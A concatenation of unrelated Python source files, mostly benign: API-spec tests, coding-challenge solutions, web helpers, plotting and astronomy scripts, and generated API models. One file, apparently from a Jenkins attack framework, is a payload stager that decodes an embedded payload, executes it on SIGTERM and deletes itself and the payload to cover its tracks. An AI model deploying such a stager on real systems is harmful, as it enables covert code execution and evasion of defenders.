--- description: get a greeting responses: 200: description: said hi """ return "dummy" expected = { "description": "get a greeting", "responses": {"200": {"description": "said hi"}}, } hello_resource = HelloResource() app.add_route("/v1/foo/v1", hello_resource) spec = spec_factory(app) base_path = 'v1' spec.path(resource=hello_resource, base_path=base_path) assert spec._paths["/foo/v1"]["get"] == expected def test_path_with_suffix(self, app, spec_factory, suffixed_resource): expected = { "description": "get a greeting", "responses": {"200": {"description": "said hi"}}, } app.add_route("/hi", suffixed_resource, suffix="hello") spec = spec_factory(app) spec.path(resource=suffixed_resource, suffix="hello") assert spec._paths["/hi"]["get"] == expected def test_path_ignore_suffix(self, app, spec_factory, suffixed_resource): expected = { "description": "get something", "responses": {"200": {"description": "said ???"}}, } app.add_route("/say", suffixed_resource) spec = spec_factory(app) spec.path(resource=suffixed_resource) assert spec._paths["/say"]["get"] == expected def test_path_suffix_all(self, app, spec_factory, suffixed_resource): app.add_route("/say", suffixed_resource) app.add_route("/say/hi", suffixed_resource, suffix="hello") spec = spec_factory(app) spec.path(resource=suffixed_resource) spec.path(resource=suffixed_resource, suffix="hello") assert spec._paths["/say"]["get"]["description"] == "get something" assert spec._paths["/say/hi"]["get"]["description"] == "get a greeting" def test_path_multiple_routes_same_resource(self, app, spec_factory): class HelloResource: """Greeting API. --- x-extension: global metadata """ hello_resource = HelloResource() app.add_route("/hi", hello_resource) app.add_route("/greet", hello_resource) spec = spec_factory(app) spec.path(resource=hello_resource) assert spec._paths["/hi"]["x-extension"] == "global metadata" with pytest.raises(KeyError): # Limitation: one route will not be documented!!! assert spec._paths["/greet"]["x-extension"] == "global metadata" def test_resource_without_endpoint(self, app, spec_factory): class HelloResource: def on_get(self, req, resp): """A greeting endpoint. --- description: get a greeting responses: 200: description: said hi """ return "dummy" hello_resource = HelloResource() spec = spec_factory(app) with pytest.raises(APISpecError): spec.path(resource=hello_resource) """ Leetcode No: 242 Title: Valid Anagram Description: Given two strings s and t, return true if t is an anagram of s, and false otherwise. An Anagram is a word or phrase formed by rearranging the letters of a different word or phrase, typically using all the original letters exactly once. 
Example 1: Input: s = "anagram", t = "nagaram" Output: true Example 2: Input: s = "rat", t = "car" Output: false """ class Solution: def is_anagram(self, s: str, t: str) -> bool: if len(s) != len(t): return False return sorted(s) == sorted(t) JonathanHuot/cellarpycellar/web.py0 # -*- coding: utf-8 -*- from bottle import response from bottle import template from bottle import MakoTemplate from bottle import CheetahTemplate from bottle import Jinja2Template import functools import logging def guess_type(filename, headers): ''' Try to guess Content-Encoding/Content-Type, and set it to current response ''' import mimetypes charset = 'UTF-8' mimetype, encoding = mimetypes.guess_type(filename) if not mimetype and filename.find(".woff2"): mimetype, encoding = mimetypes.guess_type(filename + ".woff") if encoding: headers['Content-Encoding'] = encoding if mimetype: if mimetype[:5] == 'text/' and charset and 'charset' not in mimetype: mimetype += '; charset=%s' % charset headers['Content-Type'] = mimetype def static_file(filename, root, *args, **kwargs): ''' Revised version of bottle static_file changelog: add support for woff2 extension ''' from bottle import static_file as bottle_static_file resp = bottle_static_file(filename, root, *args, **kwargs) if "Content-Type" not in response.headers: guess_type(filename, resp.headers) return resp def generate_less_from_css(filename, root, cache=None): from subprocess import call from cellar import fs from os import path css_cache = path.join(cache, filename) less_file = path.join(root, filename.replace(".css", ".less")) if not fs.static_file_exists(cache, filename) or \ path.getmtime(less_file) > path.getmtime(css_cache): logging.debug("Cache version of {0} doesn't exist or is outdated.".format(css_cache)) with open(css_cache, 'w') as fd: logging.debug("Write lessc output for {0} to {1}".format(less_file, css_cache)) call(["lessc", less_file], stdout=fd) return static_file(filename, root=cache) def generate_static_file(filename, root, *args, **kwargs): ''' Merged static_file and template bottle functions. Can generate dynamic content in css or js file. e.g. very useful to generate path or size dynamically. 
If you want jinja2 instead of SimpleTemplate, you can use: from web import jinja2_static_file as generate_static_file ''' from cellar import fs if fs.static_file_exists(root, filename): return static_file(filename, root=root) guess_type(filename, response.headers) return template(filename, *args, **kwargs) mako_static_file = functools.partial(generate_static_file, template_adapter=MakoTemplate) cheetah_static_file = functools.partial(generate_static_file, template_adapter=CheetahTemplate) jinja2_static_file = functools.partial(generate_static_file, template_adapter=Jinja2Template) 0 import numpy as np from matplotlib import colors import matplotlib.pyplot as plt import mesostat.visualization.mpl_colorbar as mpl_colorbar def imshow(fig, ax, data, xlabel=None, ylabel=None, title=None, haveColorBar=False, limits=None, extent=None, xTicks=None, yTicks=None, haveTicks=False, cmap=None, aspect='auto', fontsize=20): img = ax.imshow(data, cmap=cmap, extent=extent, aspect=aspect) if xlabel is not None: ax.set_xlabel(xlabel, fontsize=fontsize) if ylabel is not None: ax.set_ylabel(ylabel, fontsize=fontsize) if title is not None: ax.set_title(title, fontsize=fontsize) if haveColorBar: mpl_colorbar.imshow_add_color_bar(fig, ax, img) if not haveTicks: ax.axes.xaxis.set_ticks([]) ax.axes.yaxis.set_ticks([]) # ax.axis('off') if limits is not None: norm = colors.Normalize(vmin=limits[0], vmax=limits[1]) img.set_norm(norm) if xTicks is not None: ax.set_xticks(np.arange(len(xTicks))) ax.set_xticklabels(xTicks) plt.setp(ax.get_xticklabels(), rotation=45, ha="right", rotation_mode="anchor") if yTicks is not None: ax.set_yticks(np.arange(len(yTicks))) ax.set_yticklabels(yTicks) return img def plot_matrix(data, shape, xlabels=None, ylabels=None, plottitles=None, lims=None, title=None, haveColorBar=False, xTicks=None, yTicks=None, haveTicks=False, savename=None): # Create plot matrix nRows, nCols = shape fig, ax = plt.subplots(nrows=nRows, ncols=nCols, figsize=(5*nRows, 5*nCols)) if nRows == 1: ax = ax[None, :] if nCols == 1: ax = ax[:, None] if title is not None: fig.suptitle(title) # Plot data for iRow in range(nRows): for iCol in range(nCols): iPlot = iCol + nCols*iRow limitsThis = lims[iPlot] if lims is not None else None titleThis = plottitles[iPlot] if plottitles is not None else None imshow(fig, ax[iRow][iCol], data[iPlot], title=titleThis, haveColorBar=haveColorBar, haveTicks=haveTicks, xTicks=xTicks, yTicks=yTicks, limits=limitsThis) if xlabels is not None: for iCol in range(nCols): ax[0][iCol].set_title(xlabels[iCol]) if ylabels is not None: for iRow in range(nRows): ax[iRow][0].set_ylabel(ylabels[iRow]) if savename is not None: plt.savefig(savename, dpi=300) return fig, ax """ Copyright 2021 Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. 
""" import requests import json from os import path file_path = path.abspath(__file__) dir_path = path.dirname(file_path) credentials_path = path.join(dir_path,'credentials.json') class registerEventsub: def __init__(self, name=None): self.name = name self.credentials = json.load(open(credentials_path)) self.accessToken = self.getToken() if name != None: self.userId = self.getIdFromName() def getToken(self): r = requests.post(f"https://id.twitch.tv/oauth2/token?client_id={self.credentials['twitch']['id']}&client_secret={self.credentials['twitch']['secret']}&grant_type=client_credentials") print(r.json()) return f"Bearer {r.json()['access_token']}" def getIdFromName(self): r = requests.get(f"https://api.twitch.tv/helix/users?login={self.name}", headers={"Authorization": self.accessToken, "Client-Id": self.credentials['twitch']['id']}) return r.json()['data'][0]['id'] def listSubscriptions(self): r = requests.get("https://api.twitch.tv/helix/eventsub/subscriptions", headers={"Authorization": self.accessToken, "Client-Id": self.credentials['twitch']['id']}) return r.json() def deleteSubscription(self, sub_id): r = requests.delete(f"https://api.twitch.tv/helix/eventsub/subscriptions?id={sub_id}", headers={"Authorization": self.accessToken, "Client-Id": self.credentials['twitch']['id']}) print(r) def createEventSub(self): headers = { "Authorization": self.accessToken, "Client-Id": self.credentials['twitch']['id'], "Content-Type": "application/json" } data = { "type": "channel.follow", "version": "1", "condition": { "broadcaster_user_id": self.userId }, "transport": { "method": "webhook", "callback": self.credentials['endpoint'], "secret": self.credentials['twitch']['eventsub_secret'] } } r = requests.post("https://api.twitch.tv/helix/eventsub/subscriptions", headers=headers, data=json.dumps(data)) print(r.json()) def registerUser(username): eventSubInstance = registerEventsub(username) eventSubInstance.createEventSub() def removeSubscriptions(): eventSubInstance = registerEventsub() for item in eventSubInstance.listSubscriptions()['data']: eventSubInstance.deleteSubscription(item['id']) def listSubscriptions(): eventSubInstance = registerEventsub() print(json.dumps(eventSubInstance.listSubscriptions()['data'], indent=4)) #!/usr/bin/python # Codeing By IOXhop : www.ioxhop.com # : www.fb.me/maxthai import time import IOXhop_MCUio as mcu def main(): mcu.begin(0x08) while True: value = mcu.Aget(mcu.A0) print value time.sleep(0.5) if __name__ == '__main__': main()1-10 from __future__ import division, print_function, absolute_import import numpy as np __all__ = ['clarkson_woodruff_transform'] def cwt_matrix(n_rows, n_columns): """ TODO: Document Function """ S = np.zeros((n_rows, n_columns)) nz_positions = np.random.randint(0, n_rows, n_columns) values = np.random.choice([1, -1], n_columns) for i in range(n_columns): S[nz_positions[i]][i] = values[i] return S def clarkson_woodruff_transform(input_matrix, sketch_size, direcction="rows"): """ Given a matrix A (input_matrix) of size (n, d), compute a matrix A' of size (n, s) which holds: $||Ax|| = (1 \pm \epsilon) ||A'x||$ with high probability. To obtain A' we create a matrix S of size (d, s) where every column of transpose(S) has only one position distinct to zero with value +1 or -1. We multiply S*A to obtain A'. 
# ===============================================================================
# Copyright 2016
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
from __future__ import absolute_import

from pyface.tasks.traits_task_pane import TraitsTaskPane
from traits.api import Property
from traitsui.api import View, UItem, HGroup, VGroup, EnumEditor, VSplit, spring, Item
from traitsui.tabular_adapter import TabularAdapter

from pychron.core.ui.tabular_editor import myTabularEditor
from pychron.envisage.icon_button_editor import icon_button_editor


class ProjectAdapter(TabularAdapter):
    columns = [('ProjectID', 'unique_id'),
               ('Name', 'name'),
               ('Lab Contact', 'lab_contact'),
               ('PI', 'principal_investigator'),
               ('Checkin', 'checkin_date'),
               ('Comment', 'comment')]

    checkin_date_text = Property

    def _get_checkin_date_text(self):
        ret = ''
        if self.item.checkin_date:
            ret = self.item.checkin_date
        return str(ret)


class ProjectPane(TraitsTaskPane):
    def traits_view(self):
        fgrp = HGroup(UItem('filter_attr', editor=EnumEditor(name='filter_attrs')),
                      UItem('filter_str'),
                      show_border=True, label='Filter')
        tgrp = VGroup(UItem('items',
                            height=600,
                            editor=myTabularEditor(adapter=ProjectAdapter(),
                                                   editable=False,
                                                   selected='selected',
                                                   multi_select=True,
                                                   refresh='refresh',
                                                   scroll_to_row='scroll_to_row')))
        edit_grp = VGroup(Item('project_name', label='Project Name'),
                          VGroup(UItem('comment', style='custom'),
                                 enabled_when='selected',
                                 label='Comment', show_border=True),
                          HGroup(spring, icon_button_editor('save_button', 'database_save',
                                                            tooltip='Save changes to database')))
        bgrp = VSplit(tgrp, edit_grp)
        g = VGroup(fgrp, bgrp)
        v = View(g)
        return v
# ============= EOF =============================================
from math import ceil

inputs = [int(i) for i in input().split()]
print(ceil(inputs[0] / inputs[2]) * ceil(inputs[1] / inputs[2]))
real = float(input("Enter the amount in reais: "))
print("R$ {:.2f} to US {:.2f}".format(real, real / 5.53))
# the dollar exchange rate on 12/10 at 12:04
import random

import praw
import requests

reddit = None
unsplash_access_key = None


def __init__(config):
    global reddit
    reddit = praw.Reddit(
        client_id=config["reddit_client_id"],
client_secret=config["reddit_client_secret"], password=config["reddit_password"], user_agent="Photobot", username=config["reddit_username"], ) global unsplash_access_key unsplash_access_key = config["usplash_access_key"] class Photo: """A simple class for storring, URLs of photos and where they came from""" def __init__(self, url, name, source_url, creator="", creator_url=""): self.url = url self.name = name self.source_url = source_url self.creator = creator self.creator_url = creator_url def __repr__(self): return "" % ( self.url, self.name, self.source_url, ) def get_subreddits_photos(number=3): # All interesting subreddits subreddits = [ "analog", "architecture", "earthporn", "itookapicture", "natureporn", "photographs", "portraisphotos", "portraits", "portraitsporn", ] # Combine all subreddits to one string subreddits_combined = "+".join(subreddits) posts = reddit.subreddit(subreddits_combined).hot(limit=64) # Filter the posts photos = [] for post in posts: # Ignore if they are: # - text only # - under 10 upvotes # - not ok for under 18 # - sticked to a subreddit if post.is_self or post.score < 10 or post.over_18 or post.stickied: continue # Add the photo to the list photo = Photo( post.url, post.subreddit.display_name.capitalize(), "https://reddit.com" + post.permalink, post.author.name.replace("\\", "").lower(), "https://reddit.com/u/" + post.author.name + "/posts", ) photos.append(photo) # Shorten the list if it is longer than expected if len(photos) > number: random.shuffle(photos) photos = photos[:number] return photos def get_random_unsplash_photos(number=3): response = requests.get( "https://api.unsplash.com/photos", params={ "client_id": unsplash_access_key, "page": random.randint(1, 15), "per_page": number, }, ) data = response.json() # Convert the data to photos photos = [] for result in data: photo = Photo( url=result["urls"]["regular"], name=result["description"], source_url=result["links"]["html"], creator=result["user"]["name"], creator_url=result["user"]["links"]["html"], ) # Set to empty text if there is no description if photo.name is None: photo.name = "Photo" if len(photo.name) > 25: photo.name = photo.name[:22] + "..." photos.append(photo) return photos def get_inspiration_photos(number=6): print("Load inspiration images ...") # Calculate how many images of each kind reddit_number = int(number / 2) unsplash_number = number - reddit_number # Load the images photos = get_subreddits_photos(reddit_number) print(f"Got {len(photos)} reddit images") photos += get_random_unsplash_photos(unsplash_number) print(f"Got {len(photos)} unsplash images") # Shuffle the images and return them random.shuffle(photos) return photos def get_search_photos(query): response = requests.get( "https://api.unsplash.com/search/photos", params={ "query": query, "client_id": unsplash_access_key, "per_page": "5", }, ) data = response.json() photos = [] for result in data["results"]: photo = Photo( url=result["urls"]["regular"], name=result["description"], source_url=result["links"]["html"], creator=result["user"]["name"], creator_url=result["user"]["links"]["html"], ) # Set to empty text if there is no description if photo.name is None: photo.name = "Photo" if len(photo.name) > 25: photo.name = photo.name[:22] + "..." photos.append(photo) return photos examples/mplot1.py #! 
/usr/bin/env python # # quick and dirty processing of the MD All Sky images from astropy.io import fits from scipy.misc import imsave import matplotlib.pyplot as plt import matplotlib.image as mpimg import numpy as np import aplpy import argparse as ap import os.path import logging import time def d(ff, box=[]): #very specific for 16 bit data, since we want to keep the data in uint16 h = fits.open(ff, do_not_scale_image_data=True) if len(box)==0: return h[0].header, h[0].data else: # figure out 0 vs. 1 based offsets; box is 1 based return h[0].header, h[0].data[box[1]:box[3], box[0]:box[2]] def dsum(i0,i1,step = 1, box=[]): """ for a range of fits files compute the mean and dispersion from the mean """ for i in range(i0,i1+1,step): ff = 'IMG%05d.FIT' % i h1, d1 = d(ff,box) #very specific for 16 bit data, since we want to keep the data in uint16 bzero = h1['BZERO'] bscale = h1['BSCALE'] if i == i0: sum0 = 1.0 sum1 = d1*bscale+bzero sum2 = sum1*sum1 #sum1 = d1 #sum2 = d1*d1 h = h1 nx = d1.shape[1] ny = d1.shape[0] nz = i1 + 1 - i0 c = np.zeros((nz, ny, nx)) c[0,:,:] = d1.reshape(ny,nx) else: sum0 = sum0 + 1.0 sum1 = sum1 + (d1 * bscale + bzero) sum2 = sum2 + (d1 * bscale + bzero) * (d1 * bscale + bzero) #sum2 = sum2+d1*d1 c[i - i0,:,:] = d1.reshape(ny,nx) sum1 = sum1 / sum0 sum2 = sum2 / sum0 - sum1*sum1 print (type(sum1), type(sum2)) return (h,sum1,np.sqrt(sum2),c) def show(sum): """ some native matplotlib display, doesn't show pointsources well at all """ ip = plt.imshow(sum) plt.show() def show2(sum): """ aplpy is the better viewer clearly """ fig = aplpy.FITSFigure(sum) #fig.show_grayscale() fig.show_colorscale() def show3(sum1,sum2): """ aplpy is the better viewer clearly """ fig = aplpy.FITSFigure(sum1,subplot=(2,2,1)) #fig = aplpy.FITSFigure(sum2,subplot=(2,2,2),figure=1) #fig.show_grayscale() fig.show_colorscale() # For some variations on this theme, e.g. time.time vs. time.clock, see # http://stackoverflow.com/questions/7370801/measure-time-elapsed-in-python # class Dtime(object): """ Class to help measuring the wall clock time between tagged events Typical usage: dt = Dtime() ... dt.tag('a') ... 
dt.tag('b') """ def __init__(self, label=".", report=True): self.start = self.time() self.init = self.start self.label = label self.report = report self.dtimes = [] dt = self.init - self.init if self.report: logging.info("Dtime: %s ADMIT " % self.label + str(self.start)) logging.info("Dtime: %s BEGIN " % self.label + str(dt)) def reset(self, report=True): self.start = self.time() self.report = report self.dtimes = [] def tag(self, mytag): t0 = self.start t1 = self.time() dt = t1 - t0 self.dtimes.append((mytag, dt)) self.start = t1 if self.report: logging.info("Dtime: %s " % self.label + mytag + " " + str(dt)) return dt def show(self): if self.report: for r in self.dtimes: logging.info("Dtime: %s " % self.label + str(r[0]) + " " + str(r[1])) return self.dtimes def end(self): t0 = self.init t1 = self.time() dt = t1 - t0 if self.report: logging.info("Dtime: %s END " % self.label + str(dt)) return dt def time(self): """ pick the actual OS routine that returns some kind of timer time.time : wall clock time (include I/O and multitasking overhead) time.clock : cpu clock time """ return np.array([time.clock(), time.time()]) if __name__ == '__main__': logging.basicConfig(level = logging.INFO) dt = Dtime("mplot1") #--start, -s n #--end, -e n #--box x1 y1 x2 y2 parser = ap.ArgumentParser(description='Plotting .fits files.') parser.add_argument('-f', '--frame', nargs = '*', type = int, help = 'Starting and ending parameters for the frames analyzed') parser.add_argument('-b', '--box', nargs = 4, type = int, help = 'Coordinates for the bottom left corner and' + 'top right corner of a rectangle of pixels to be analyzed from the' + ' data. In the structure x1, y1, x2, y2 (1 based numbers)') parser.add_argument('-g', '--graphics', nargs = 1, type = int, default = 0, help = 'Controls whether to display or save graphics. 0: no graphics,' + '1: display graphics, 2: save graphics as .png') args = vars(parser.parse_args()) if args['frame'] == None: count = 0 start = None end = None step = 1 #while we have yet to find an end while end == None: filename = 'IMG%05d.FIT' % count #if start has not been found yet, and this file exists if start == None and os.path.isfile(filename): start = count #if start has been found and we finally found a file that doesn't #exist, set end to the last file that existed (count - 1.FIT) elif start != None and not os.path.isfile(filename): end = count - 1 count += 1 elif len(args['frame']) >= 2 and len(args['frame']) <= 3: start = args['frame'][0] # starting frame (IMGnnnnn.FIT) end = args['frame'][1] # ending frame if len(args['frame']) == 3: step = args['frame'] else: step = 1 else: raise Exception("-f needs 0, 2, or 3 arguments.") box = args['box'] # BLC and TRC if box == None: box = [] dt.tag("start") # compute the average and dispersion of the series h1,sum1,sum2,cube = dsum(start,end,step,box=box) # end can be uninitialized here might throw an error? 
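# (Added, hedged note on the question above: as written, `end` cannot actually
#  reach dsum() uninitialized; if no IMGnnnnn.FIT files exist, neither branch of
#  the while loop ever fires, so the scan simply never terminates. A bound on
#  `count` inside that loop, for example
#      if count > 99999: raise SystemExit("no IMGnnnnn.FIT frames found")
#  would turn the silent hang into an explicit error; the limit is illustrative only.)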
dt.tag("dsum") nz = cube.shape[0] # delta X and Y images dsumy = sum1 - np.roll(sum1, 1, axis = 0) # change in the y axis dsumx = sum1 - np.roll(sum1, 1, axis = 1) # change in the x axis # write them to FITS fits.writeto('dsumx.fits', dsumx, h1, clobber=True) fits.writeto('dsumy.fits', dsumy, h1, clobber=True) fits.writeto('sum1.fits', sum1, h1, clobber=True) fits.writeto('sum2.fits', sum2, h1, clobber=True) dt.tag("write2d") # 3D cube to h1['NAXIS'] = 3 h1['NAXIS3'] = nz fits.writeto('cube.fits', cube, h1, clobber=True) dt.tag("write3d") if args['graphics'][0] == 1: # plot the sum1 and sum2 correllation (glueviz should do this) s1 = sum1.flatten() s2 = sum2.flatten() fig = plt.figure() ax = fig.add_subplot(111) ax.scatter(s1,s2) plt.show() show2(sum1) show2(sum2) if args['graphics'][0] == 2: imsave('sum1.png', sum1) imsave('sum2.png', sum2) dt.tag("done") dt.end() challenges/bringing-a-gun-to-a-trainer-fight/solution_01.py0 from math import atan2 def solution(dimensions, your_position, trainer_position, distance): w, h = dimensions x, y = your_position a, b = trainer_position m_x = ((x + distance) // w) + 1 m_y = ((y + distance) // h) + 1 dd = distance**2 aa = {} def reflect(x1, y1, n, m): return (n * w) + (w - x1) if n % 2 == 1 else (n * w) + x1, (m * h) + (h - y1) if m % 2 == 1 else (m * h) + y1 def l2(x1, y1): return (x1 - x)**2 + (y1 - y)**2 def angle(x1, y1): return atan2((y1 - y), (x1 - x)) pp1 = [] for i in range(m_x + 1): for j in range(m_y + 1): p = reflect(x, y, i, j) if l2(*p) <= dd: pp1.append((p[0], p[1], 0)) p = reflect(a, b, i, j) if l2(*p) <= dd: pp1.append((p[0], p[1], 1)) pp2 = [(-p[0], p[1], p[2]) for p in pp1 if l2(-p[0], p[1]) <= dd] pp3 = [(-p[0], -p[1], p[2]) for p in pp1 if l2(-p[0], -p[1]) <= dd] pp4 = [( p[0], -p[1], p[2]) for p in pp1 if l2( p[0], -p[1]) <= dd] for p in pp1: d = l2(p[0], p[1]) a = angle(p[0], p[1]) if d > 0 and (a not in aa or d < aa[a][3]): aa[a] = (p[0], p[1], p[2], d) for p in pp2: d = l2(p[0], p[1]) a = angle(p[0], p[1]) if d > 0 and (a not in aa or d < aa[a][3]): aa[a] = (p[0], p[1], p[2], d) for p in pp3: d = l2(p[0], p[1]) a = angle(p[0], p[1]) if d > 0 and (a not in aa or d < aa[a][3]): aa[a] = (p[0], p[1], p[2], d) for p in pp4: d = l2(p[0], p[1]) a = angle(p[0], p[1]) if d > 0 and (a not in aa or d < aa[a][3]): aa[a] = (p[0], p[1], p[2], d) return len([k for k in aa if aa[k][2] == 1]) from typing import List class Solution: def buildArray(self, target: List[int], n: int) -> List[str]: ls, j, l = [], 0, len(target) for i in range(1, n + 1): ls.append("Push") if target[j] == i: j += 1 if j == l: return ls else: ls.append("Pop") return ls Classes/environment.py #!/usr/env/bin python3 import pygame from Game.Classes.image import image class environment(object): def __init__(self, name, ecran, posX = 0, posY = 0): self.ecran = ecran self.posX = posX self.posY = posY self.name = name self.image = None def getImage(self): if self.image == None: self.image = pygame.image.load(image.getImagePath()+"Environment/" + self.name + ".png").convert_alpha() return self.image @property def startPosX(self): return self.posX @property def endPosX(self): return self.posX + self.image.get_width() def refresh(self): self.ecran.blit(self.getImage(), (self.posX, self.posY))# This file is Copyright (c) 2018 <> # This file is Copyright (c) 2018-2019 <> # License: BSD import os from migen import * from litex.soc.interconnect import wishbone CPU_VARIANTS = ["standard"] class Minerva(Module): @property def name(self): return "minerva" @property def 
endianness(self): return "little" @property def gcc_triple(self): return ("riscv64-unknown-elf", "riscv32-unknown-elf", "riscv-none-embed") @property def gcc_flags(self): flags = "-march=rv32i " flags += "-mabi=ilp32 " flags += "-D__minerva__ " return flags @property def linker_output_format(self): return "elf32-littleriscv" @property def reserved_interrupts(self): return {} def __init__(self, platform, cpu_reset_address, variant="standard"): assert variant is "standard", "Unsupported variant %s" % variant self.platform = platform self.variant = variant self.reset = Signal() self.ibus = wishbone.Interface() self.dbus = wishbone.Interface() self.interrupt = Signal(32) # # # self.specials += Instance("minerva_cpu", # clock / reset i_clk=ClockSignal(), i_rst=ResetSignal(), # interrupts i_external_interrupt=self.interrupt, # ibus o_ibus__stb=self.ibus.stb, o_ibus__cyc=self.ibus.cyc, o_ibus__cti=self.ibus.cti, o_ibus__bte=self.ibus.bte, o_ibus__we=self.ibus.we, o_ibus__adr=self.ibus.adr, o_ibus__dat_w=self.ibus.dat_w, o_ibus__sel=self.ibus.sel, i_ibus__ack=self.ibus.ack, i_ibus__err=self.ibus.err, i_ibus__dat_r=self.ibus.dat_r, # dbus o_dbus__stb=self.dbus.stb, o_dbus__cyc=self.dbus.cyc, o_dbus__cti=self.dbus.cti, o_dbus__bte=self.dbus.bte, o_dbus__we=self.dbus.we, o_dbus__adr=self.dbus.adr, o_dbus__dat_w=self.dbus.dat_w, o_dbus__sel=self.dbus.sel, i_dbus__ack=self.dbus.ack, i_dbus__err=self.dbus.err, i_dbus__dat_r=self.dbus.dat_r, ) # add verilog sources self.add_sources(platform) @staticmethod def add_sources(platform): vdir = os.path.join( os.path.abspath(os.path.dirname(__file__)), "verilog") platform.add_source(os.path.join(vdir, "minerva.v")) # coding: utf-8 """ NiFi Rest Api The Rest Api provides programmatic access to command and control a NiFi instance in real time. Start and stop processors, monitor queues, query provenance data, and more. Each endpoint below includes a description, definitions of the expected input and output, potential response codes, and the authorizations required to invoke each service. OpenAPI spec version: 1.11.1-SNAPSHOT Contact: Generated by: https://github.com/swagger-api/swagger-codegen.git """ from pprint import pformat from six import iteritems import re class ReportingTaskStatusDTO(object): """ NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'run_status': 'str', 'validation_status': 'str', 'active_thread_count': 'int' } attribute_map = { 'run_status': 'runStatus', 'validation_status': 'validationStatus', 'active_thread_count': 'activeThreadCount' } def __init__(self, run_status=None, validation_status=None, active_thread_count=None): """ ReportingTaskStatusDTO - a model defined in Swagger """ self._run_status = None self._validation_status = None self._active_thread_count = None if run_status is not None: self.run_status = run_status if validation_status is not None: self.validation_status = validation_status if active_thread_count is not None: self.active_thread_count = active_thread_count @property def run_status(self): """ Gets the run_status of this ReportingTaskStatusDTO. The run status of this ReportingTask :return: The run_status of this ReportingTaskStatusDTO. 
:rtype: str """ return self._run_status @run_status.setter def run_status(self, run_status): """ Sets the run_status of this ReportingTaskStatusDTO. The run status of this ReportingTask :param run_status: The run_status of this ReportingTaskStatusDTO. :type: str """ allowed_values = ["RUNNING", "STOPPED", "DISABLED"] if run_status not in allowed_values: raise ValueError( "Invalid value for `run_status` ({0}), must be one of {1}" .format(run_status, allowed_values) ) self._run_status = run_status @property def validation_status(self): """ Gets the validation_status of this ReportingTaskStatusDTO. Indicates whether the component is valid, invalid, or still in the process of validating (i.e., it is unknown whether or not the component is valid) :return: The validation_status of this ReportingTaskStatusDTO. :rtype: str """ return self._validation_status @validation_status.setter def validation_status(self, validation_status): """ Sets the validation_status of this ReportingTaskStatusDTO. Indicates whether the component is valid, invalid, or still in the process of validating (i.e., it is unknown whether or not the component is valid) :param validation_status: The validation_status of this ReportingTaskStatusDTO. :type: str """ allowed_values = ["VALID", "INVALID", "VALIDATING"] if validation_status not in allowed_values: raise ValueError( "Invalid value for `validation_status` ({0}), must be one of {1}" .format(validation_status, allowed_values) ) self._validation_status = validation_status @property def active_thread_count(self): """ Gets the active_thread_count of this ReportingTaskStatusDTO. The number of active threads for the component. :return: The active_thread_count of this ReportingTaskStatusDTO. :rtype: int """ return self._active_thread_count @active_thread_count.setter def active_thread_count(self, active_thread_count): """ Sets the active_thread_count of this ReportingTaskStatusDTO. The number of active threads for the component. :param active_thread_count: The active_thread_count of this ReportingTaskStatusDTO. 
:type: int """ self._active_thread_count = active_thread_count def to_dict(self): """ Returns the model properties as a dict """ result = {} for attr, _ in iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value return result def to_str(self): """ Returns the string representation of the model """ return pformat(self.to_dict()) def __repr__(self): """ For `print` and `pprint` """ return self.to_str() def __eq__(self, other): """ Returns true if both objects are equal """ if not isinstance(other, ReportingTaskStatusDTO): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """ Returns true if both objects are not equal """ return not self == other sc979/jenkins-attack-framework #!/usr/bin/python import base64 import inspect import os import signal import time import zlib def handler(*ignored): current_file = os.path.abspath(inspect.stack()[0][1]) script_file = os.path.join(os.path.dirname(current_file), "@{file_name}") with open(script_file, "wb") as f: f.write(zlib.decompress(base64.b64decode("@{payload}"))) os.chmod(script_file, 509) os.system("@!{executor}" + script_file + "@!{additional_args}") os.remove(script_file) os.remove(current_file) signal.signal(signal.SIGTERM, handler) while True: time.sleep(100000) 1-10 #!/usr/bin/env python # encoding: utf-8 """ Advent of Code 2021 - Day 08 https://adventofcode.com/2021/day/08 Solution 1: 521 Solution 2: 1016804 """ __author__ = "" __email__ = "" from difflib import SequenceMatcher SEVEN_SEGMENT = {0: 'abcefg', 1: 'cf', 2: 'acdeg', 3: 'acdfg', 4: 'bcdf', 5: 'abdfg', 6: 'abdefg', 7: 'acf', 8: 'abcdefg', 9: 'abcdfg'} def similar(a, b): return SequenceMatcher(None, a, b).ratio() def signatures(strings): """Returns a list of hashable signatures based on the distance between each string and all the other strings in the input vector """ return [tuple(sorted(similar(a, b) for b in strings)) for a in strings] def main(ifile='inputs/day_08_input.txt'): symbols = list(SEVEN_SEGMENT.values()) lengths = [len(v) for v in symbols] unique_lengths = [v for v in lengths if lengths.count(v) == 1] sign_to_num = {x: v for x, v in zip(signatures(symbols), SEVEN_SEGMENT)} counter = 0 total = 0 with open(ifile) as file: for line in file: pattern, output = ([''.join(sorted(x)) for x in field.split()] for field in line.strip().split(' | ')) # Part 1 counter += len([digit for digit in output if len(digit) in unique_lengths]) # Part 2 str_to_sign = {x: v for x, v in zip(pattern, signatures(pattern))} output_value = [sign_to_num[str_to_sign[x]] for x in output] total += int(''.join(str(x) for x in output_value)) print(f"There are {counter} digits with a unique number of segments") print(f"The sum of all 4-digit outputs is {total}") return [counter, total] if __name__ == "__main__": main() import os, re import requests, threading import bs4 from clint.textui import prompt, puts, validators, columns BASE_URL = 'http://www.shanaproject.com' OUTPATH = 